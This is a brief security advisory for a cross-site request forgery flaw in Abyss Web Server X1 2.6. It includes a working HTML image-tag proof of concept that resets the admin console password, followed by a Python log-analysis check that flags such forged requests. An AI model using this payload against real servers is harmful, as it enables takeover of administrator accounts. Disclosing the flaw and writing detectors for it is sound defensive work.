Abyss Web Server X1 2.6 Cross-site Request Forgery

Description

A cross-site request forgery vulnerability in Abyss Web Server X1 2.6 can be exploited to change the admin password.

Proof Of Concept

<html>
    <body>
        <img src="http://127.0.0.1:9999/console/credentials?%2fconsole%2fcredentials%2flogin=admin&%2fconsole%2fcredentials%2fpassword%2f%24pass1=Password1&%2fconsole%2fcredentials%2fpassword%2f%24pass2=Password1&%2fconsole%2fcredentials%2fbok=%c2%a0%c2%a0OK%c2%a0%c2%a0" />
    </body>
</html>
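
A defender-side check for the request pattern above, added here as an example (it is not part of the original advisory or the vendor's code): it flags GET requests to /console/credentials that carry password parameters without a Referer from the console's own origin. The combined log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: console requests are recorded in combined log format.
LOG_RE = re.compile(r'\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)"')
CONSOLE_ORIGIN = ("127.0.0.1", 9999)  # console address used in the PoC above
CRED_PATH = "/console/credentials"

def same_origin(referer):
    """True only if the Referer header points at the console itself."""
    if referer in ("", "-"):
        return False
    try:
        ref = urlsplit(referer)
        return (ref.hostname, ref.port) == CONSOLE_ORIGIN
    except ValueError:  # malformed host or port
        return False

def is_cross_site_password_change(line):
    """Flag a GET that sets the console password without a same-origin Referer."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return False
    url = urlsplit(m["target"])
    if url.path != CRED_PATH:
        return False
    # parse_qsl percent-decodes names like %2fconsole%2fcredentials%2fpassword%2f%24pass1
    names = [k for k, _ in parse_qsl(url.query, keep_blank_values=True)]
    if not any(n.startswith(CRED_PATH + "/password/") for n in names):
        return False
    return not same_origin(m["referer"])

# Constructed sample lines (not from a real server); the password value is a placeholder.
QUERY = ("%2fconsole%2fcredentials%2flogin=admin"
         "&%2fconsole%2fcredentials%2fpassword%2f%24pass1=x"
         "&%2fconsole%2fcredentials%2fpassword%2f%24pass2=x")
def log_line(target, referer):
    return (f'127.0.0.1 - - [01/Jan/2018:10:00:00 +0000] "GET {target} HTTP/1.1" '
            f'200 512 "{referer}" "Mozilla/5.0"')

SAMPLE_LOG = [
    log_line(f"{CRED_PATH}?{QUERY}", "http://example.test/page.html"),  # foreign page
    log_line(f"{CRED_PATH}?{QUERY}", "-"),                              # Referer stripped
    log_line(f"{CRED_PATH}?{QUERY}", "http://127.0.0.1:9999/console/credentials"),
    log_line(CRED_PATH, "-"),                                           # plain page view
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(is_cross_site_password_change(line), line[:90])
```

A missing Referer is flagged as well, because a referrer policy or a non-HTTP embedding page can strip it from a forged request.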


Copyright © 2018 AutoSec Tools LLC